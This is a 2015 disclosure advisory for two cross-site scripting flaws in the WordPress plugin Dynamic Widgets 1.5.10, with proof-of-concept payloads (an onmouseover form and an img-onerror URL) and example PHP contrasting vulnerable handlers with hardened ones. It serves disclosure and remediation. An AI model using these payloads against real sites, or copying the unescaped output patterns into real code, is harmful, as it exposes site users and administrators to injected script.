Subject: Cross-Site Scripting (XSS) in Dynamic Widgets 1.5.10
Date: Tue, 11 Aug 2015 12:59:58 +0200

Hello,

Plugin: Dynamic Widgets 1.5.10 https://wordpress.org/plugins/dynamic-widgets/


1. Cross-Site Scripting (XSS) 

Any authenticated user (a subscriber account is enough) can reach the term_tree AJAX handler. The prefix and widget_id POST parameters are written into the HTML the handler returns without escaping, so arbitrary HTML/JS can be injected.

Method: POST
Url: http://localhost/wp-admin/admin-ajax.php?action=term_tree
Vulnerable parameters: prefix, widget_id

Example PHP callstack:
dynwid_term_tree   [/dynamic-widgets/dynamic-widgets.php:831]
DW_CustomPost::prtTax   [/dynamic-widgets/mods/custompost_module.php:278]


Verification (submit the form while logged in as a low-privileged user, e.g. a subscriber):
--
<form method="POST" action="http://localhost/wp-admin/admin-ajax.php?action=term_tree">
<input type="text" name="id" value="1" />
<input type="text" name="widget_id" value="1" />
<input type="text" name="name" value="xxxxxxx" />
<input type="text" name="prefix" value='" onmouseover=alert(1) />' />
<input type="submit" />
</form>
--


2. Cross-Site Scripting (XSS) 

The page_limit GET parameter is reflected unescaped on the plugin's overview page. The page is only reachable by administrators, but the request carries no nonce (CSRF protection), so an attacker can deliver the payload by luring a logged-in administrator to a crafted URL.

Method: GET
Url: http://localhost/wp-admin/themes.php?page=dynwid-config&page_limit=[xss]
Vulnerable parameter: page_limit

Example PHP callstack:
/dynamic-widgets/dynwid_admin_overview.php:146

Verification:
http://localhost/wp-admin/themes.php?page=dynwid-config&page_limit=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E
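Both findings share one sink: a request parameter written into an HTML attribute value without escaping. The following is an added example written for this advisory, not the plugin's own code. It shows a minimal reproduction of the vulnerable shape for each finding next to a hardened handler that adds a capability check, a nonce and output escaping. The function names (example_*), the nonce action names (dynwid_term_tree, dynwid_page_limit) and the markup produced are assumptions; only the parameter names, the AJAX action and the admin page come from the advisory.

```php
<?php
// Added example, not the Dynamic Widgets plugin's own code. Handler bodies,
// nonce action names and the markup are assumptions for illustration only.

// --- Finding 1: shape of the term_tree XSS ---------------------------------
// widget_id, prefix and name go straight into attribute values, so a prefix of
//   " onmouseover=alert(1) />
// closes the id attribute and adds an event handler to the element.
function example_term_tree_vulnerable() {
    $widget_id = $_POST['widget_id'];
    $prefix    = $_POST['prefix'];
    $name      = $_POST['name'];
    echo '<input type="checkbox" id="' . $prefix . '-' . $widget_id
       . '" name="' . $name . '[]" value="1" />';
    wp_die();
}

// Hardened handler: capability check, nonce check, typed input, escaped output.
function example_term_tree_hardened() {
    // Subscribers have no business configuring widgets; require the capability
    // WordPress itself uses for the widgets screen.
    if ( ! current_user_can( 'edit_theme_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }
    // The admin page must issue the nonce with wp_create_nonce( 'dynwid_term_tree' )
    // (hypothetical action name) and the JS must send it as the "nonce" field.
    check_ajax_referer( 'dynwid_term_tree', 'nonce' );

    $widget_id = absint( $_POST['widget_id'] );     // widget ids are numeric
    $prefix    = sanitize_key( $_POST['prefix'] );  // restrict to [a-z0-9_-]
    $name      = sanitize_key( $_POST['name'] );

    // esc_attr() at the sink is the control that still holds if the
    // sanitizers above are ever relaxed.
    printf(
        '<input type="checkbox" id="%s-%d" name="%s[]" value="1" />',
        esc_attr( $prefix ),
        $widget_id,
        esc_attr( $name )
    );
    wp_die();
}
// Hook for admin-ajax.php?action=term_tree (logged-in users):
// add_action( 'wp_ajax_term_tree', 'example_term_tree_hardened' );

// --- Finding 2: page_limit reflected on the overview page ------------------
// Vulnerable shape: the GET value is written back into a form field, so
//   page_limit="><img src=x onerror=alert(1) />
// breaks out of the value attribute.
function example_overview_vulnerable() {
    $page_limit = $_GET['page_limit'];
    echo '<input type="text" name="page_limit" value="' . $page_limit . '" />';
}

// Hardened: page_limit is a count, so coerce it to an integer and escape it
// anyway. The nonce check stops a third-party page from driving an
// administrator's browser to the URL; restricting the page to administrators
// alone does not help, because the administrator is the victim here.
function example_overview_hardened() {
    $page_limit = 20;                                   // assumed default
    if ( isset( $_GET['page_limit'] ) ) {
        check_admin_referer( 'dynwid_page_limit' );     // expects _wpnonce
        $page_limit = max( 1, absint( $_GET['page_limit'] ) );
    }
    printf(
        '<input type="text" name="page_limit" value="%s" />',
        esc_attr( $page_limit )
    );
    // Any link that changes page_limit must be built with wp_nonce_url(), e.g.
    // wp_nonce_url( admin_url( 'themes.php?page=dynwid-config&page_limit=50' ),
    //               'dynwid_page_limit' );
}
```

With the hardened handlers, the two payloads in this advisory are rendered as inert attribute text: `"` becomes `&quot;` and `<` becomes `&lt;`, and the page_limit value is an integer before it ever reaches the template.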


--
Regards,
Marcin Probola,